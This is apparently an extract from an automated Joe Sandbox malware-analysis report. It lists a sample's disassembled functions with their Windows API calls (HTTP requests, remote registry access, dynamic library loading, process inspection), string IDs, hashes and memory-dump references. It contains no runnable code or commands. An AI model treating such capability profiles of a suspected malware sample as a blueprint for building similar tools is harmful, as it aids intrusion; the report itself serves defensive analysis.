                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Delete$InfoItem_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1173514356-4108050209
                                                                                                                      • Opcode ID: 3082d9c9615ac1ab09930055b8ad2a76979047930898ec7baee48530a6893f53
                                                                                                                      • Instruction ID: a329fbf53671d3814d0d154dc9169e3ffca9d4baac9d5a6424478de7cb7c812c
                                                                                                                      • Opcode Fuzzy Hash: 3082d9c9615ac1ab09930055b8ad2a76979047930898ec7baee48530a6893f53
                                                                                                                      • Instruction Fuzzy Hash: C241AE78204352AFD720DF25E884B6ABBE8FF86314F04492DF965972D1D770E804CB52
                                                                                                                      Function 0053D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0053D7C5
                                                                                                                        • Part of subcall function 004C784B: _memmove.LIBCMT ref: 004C7899
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharLower_memmove
                                                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                                                      • API String ID: 3425801089-567219261
                                                                                                                      • Opcode ID: f9e44d72046f138aced2c19b32603dbda5625de7cbd6625bdb17a706571bf364
                                                                                                                      • Instruction ID: a4eb5e56a654d479b868fdec4a02331f76e5ea75c12988730c98b34773eb0078
                                                                                                                      • Opcode Fuzzy Hash: f9e44d72046f138aced2c19b32603dbda5625de7cbd6625bdb17a706571bf364
                                                                                                                      • Instruction Fuzzy Hash: AD31CF71904219ABCF00EF65D8519EEBBB4FF54324F008A6EE829A72D1DB71A945CB90
                                                                                                                      Function 00518E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
                                                                                                                        • Part of subcall function 0051AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0051AABC
                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00518F14
                                                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00518F27
                                                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00518F57
                                                                                                                        • Part of subcall function 004C7BCC: _memmove.LIBCMT ref: 004C7C06
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$_memmove$ClassName
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 365058703-1403004172
                                                                                                                      • Opcode ID: c1bec89aafa00ea9be2aadd6eb5d6f7e0d56457f7beed69a39a16bb5c734c5d8
                                                                                                                      • Instruction ID: 51930fc4119426a5a132812b8f577553c02d327497ae9a3537ca4a0fd57a683a
                                                                                                                      • Opcode Fuzzy Hash: c1bec89aafa00ea9be2aadd6eb5d6f7e0d56457f7beed69a39a16bb5c734c5d8
                                                                                                                      • Instruction Fuzzy Hash: C2213475A00104BBEB24ABB5DC85DFFBB69EF46364F00452EF425971E0DF38188A9A10
                                                                                                                      Function 0053182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0053184C
                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00531872
                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 005318A2
                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 005318E9
                                                                                                                        • Part of subcall function 00532483: GetLastError.KERNEL32(?,?,00531817,00000000,00000000,00000001), ref: 00532498
                                                                                                                        • Part of subcall function 00532483: SetEvent.KERNEL32(?,?,00531817,00000000,00000000,00000001), ref: 005324AD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3113390036-3916222277
                                                                                                                      • Opcode ID: c0bc3d047b90be90ab3d585683236e2ae943bef9fc09ded57d28fd3dee6dc340
                                                                                                                      • Instruction ID: 6f8eb4fab6d7a825c0391b680bb394c5717ff6899f6e5192ad1819494e31949f
                                                                                                                      • Opcode Fuzzy Hash: c0bc3d047b90be90ab3d585683236e2ae943bef9fc09ded57d28fd3dee6dc340
                                                                                                                      • Instruction Fuzzy Hash: E121B0B5500608BFEB119F65DC85EBBBBEDFB89788F10412AF40593240EA249D0467B8
                                                                                                                      Function 005463E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004C1D73
                                                                                                                        • Part of subcall function 004C1D35: GetStockObject.GDI32(00000011), ref: 004C1D87
                                                                                                                        • Part of subcall function 004C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 004C1D91
                                                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00546461
                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00546468
                                                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0054647D
                                                                                                                      • DestroyWindow.USER32(?), ref: 00546485
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                      • String ID: SysAnimate32
                                                                                                                      • API String ID: 4146253029-1011021900
                                                                                                                      • Opcode ID: 328e7bcd323d6b66403081fd01ab62f19e5abb6eb4241dad6e9688182c8d0abb
                                                                                                                      • Instruction ID: c9e782880b279edbc9b123c53778c605465df87dcaa4f4e76e24b086f3a5406f
                                                                                                                      • Opcode Fuzzy Hash: 328e7bcd323d6b66403081fd01ab62f19e5abb6eb4241dad6e9688182c8d0abb
                                                                                                                      • Instruction Fuzzy Hash: A3215B75200205ABEF104FA4DC84FFA7BA9FB5A36CF108A29FA1493191D7719C51A762
                                                                                                                      Function 00526D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00526DBC
                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00526DEF
                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00526E01
                                                                                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00526E3B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateHandle$FilePipe
                                                                                                                      • String ID: nul
                                                                                                                      • API String ID: 4209266947-2873401336
                                                                                                                      • Opcode ID: f8404999ff03e451b4899ea8c88c8ad9379f27997c5dd4ba7e8d4024c4f03f1c
                                                                                                                      • Instruction ID: 53253bf57b6af2f080160eb9fa3c722483a1caa54d9c914c0955057b62eb2544
                                                                                                                      • Opcode Fuzzy Hash: f8404999ff03e451b4899ea8c88c8ad9379f27997c5dd4ba7e8d4024c4f03f1c
                                                                                                                      • Instruction Fuzzy Hash: 7221A47560022AABDB209F39EC04A9A7FF8FF96720F204A19FCA1D72D0D7709954DB50
                                                                                                                      Function 00526E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00526E89
                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00526EBB
                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00526ECC
                                                                                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00526F06
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateHandle$FilePipe
                                                                                                                      • String ID: nul
                                                                                                                      • API String ID: 4209266947-2873401336
                                                                                                                      • Opcode ID: eacce4f6d80b7c8c3dd0846a24da2c6680b6ea8a575c4dfa3414b34844ab0b94
                                                                                                                      • Instruction ID: 620ca4fe45c19f2490cc4b02f05739296972ac1acca9adfb1a4bc7f80ec18a40
                                                                                                                      • Opcode Fuzzy Hash: eacce4f6d80b7c8c3dd0846a24da2c6680b6ea8a575c4dfa3414b34844ab0b94
                                                                                                                      • Instruction Fuzzy Hash: 072162795003259BDB209F69EC44A9B7BA8FF56734F200A19FCA1E72D0D770A855CB50
                                                                                                                      Function 0052AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0052AC54
                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0052ACA8
                                                                                                                      • __swprintf.LIBCMT ref: 0052ACC1
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,0054F910), ref: 0052ACFF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                      • String ID: %lu
                                                                                                                      • API String ID: 3164766367-685833217
                                                                                                                      • Opcode ID: 0a17bb95439294dcc9e155353621f95d1052ec16b5a0db7af8baf4b14b622ea4
                                                                                                                      • Instruction ID: 3db0aa373a0e187d7e2acad807128f7554d66129bdd88954bdfd5b935079e1e6
                                                                                                                      • Opcode Fuzzy Hash: 0a17bb95439294dcc9e155353621f95d1052ec16b5a0db7af8baf4b14b622ea4
                                                                                                                      • Instruction Fuzzy Hash: 2F219234A00109AFCB10DF69D945EEE7BB8FF89318B0040ADF909AB251DA35EE41DB21
                                                                                                                      Function 00521142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0051FCED,?,00520D40,?,00008000), ref: 0052115F
                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0051FCED,?,00520D40,?,00008000), ref: 00521184
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0051FCED,?,00520D40,?,00008000), ref: 0052118E
                                                                                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,0051FCED,?,00520D40,?,00008000), ref: 005211C1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                                                      • String ID: @R
                                                                                                                      • API String ID: 2875609808-3205503559
                                                                                                                      • Opcode ID: dbe3e653b2fb9bb4efa346623e1904306b67009c62f4d5c682eab157ee0c1f88
                                                                                                                      • Instruction ID: f1863c7d896154a4ea75a486766f2a3a43fac78a86c0f66b77e10e506a45e327
                                                                                                                      • Opcode Fuzzy Hash: dbe3e653b2fb9bb4efa346623e1904306b67009c62f4d5c682eab157ee0c1f88
                                                                                                                      • Instruction Fuzzy Hash: 5C112E36D0092DE7CF009FA5E8486EEBFB8FF2A711F014455EA45B2280CB7055A4DB9A
                                                                                                                      Function 00521AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00521B19
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper
                                                                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                      • API String ID: 3964851224-769500911
                                                                                                                      • Opcode ID: 820016293cf60de5e48a2514b77e7608d4b7cc3bc237dc324b4509b833a2e378
                                                                                                                      • Instruction ID: 49baea77dc69d6017d92b7cd13d3c2abdf948b77847560ae14c47beabb3bd7bc
                                                                                                                      • Opcode Fuzzy Hash: 820016293cf60de5e48a2514b77e7608d4b7cc3bc237dc324b4509b833a2e378
                                                                                                                      • Instruction Fuzzy Hash: FD11A1349401989FCF00EF95E8518FFBBB4FF36308B1084A9D86867691EB325D46DB58
                                                                                                                      Function 0053EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0053EC07
                                                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0053EC37
                                                                                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0053ED6A
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0053EDEB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2364364464-0
                                                                                                                      • Opcode ID: a70d9f7ce2a2f5b8008ca1218abbf3ea91b68dd3e007aa1cd76bc9534c53f63b
                                                                                                                      • Instruction ID: 506d17b3080672e4705e73f7aaae019f9653cc0896b5afab4d2b41a1f02df206
                                                                                                                      • Opcode Fuzzy Hash: a70d9f7ce2a2f5b8008ca1218abbf3ea91b68dd3e007aa1cd76bc9534c53f63b
                                                                                                                      • Instruction Fuzzy Hash: 64819175600300AFD760EF29C846F2ABBE5BF84714F04881EF99ADB2D2DA74AC45CB55
                                                                                                                      Function 004E541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1559183368-0
                                                                                                                      • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                                                                      • Instruction ID: 734ba8ca51025cf985295fe290775e652525441f99c27da5dab604a8035bee97
                                                                                                                      • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                                                                      • Instruction Fuzzy Hash: E951BC30A00B85EBCB148F67D84066F77B6AF4032AF14472FF425963D5D7789D518B49
                                                                                                                      Function 00540037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
                                                                                                                        • Part of subcall function 00540E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0053FDAD,?,?), ref: 00540E31
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005400FD
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0054013C
                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00540183
                                                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 005401AF
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 005401BC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3440857362-0
                                                                                                                      • Opcode ID: aa1431b9d9f00d72963a11434be7365bfa544f8778c3797e224185047a6a9d5d
                                                                                                                      • Instruction ID: 8423cfd1a779d7714bd5ead9b45170c3a32615a1ff82d0cc6fbf7b150c20e38f
                                                                                                                      • Opcode Fuzzy Hash: aa1431b9d9f00d72963a11434be7365bfa544f8778c3797e224185047a6a9d5d
                                                                                                                      • Instruction Fuzzy Hash: F7515C71208204AFD704EF68CC85FAABBE9FF84318F50591DF55587291DB35E944CB52
                                                                                                                      Function 0053D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C9837: __itow.LIBCMT ref: 004C9862
                                                                                                                        • Part of subcall function 004C9837: __swprintf.LIBCMT ref: 004C98AC
                                                                                                                      • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0053D927
                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0053D9AA
                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0053D9C6
                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0053DA07
                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0053DA21
                                                                                                                        • Part of subcall function 004C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00527896,?,?,00000000), ref: 004C5A2C
                                                                                                                        • Part of subcall function 004C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00527896,?,?,00000000,?,?), ref: 004C5A50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
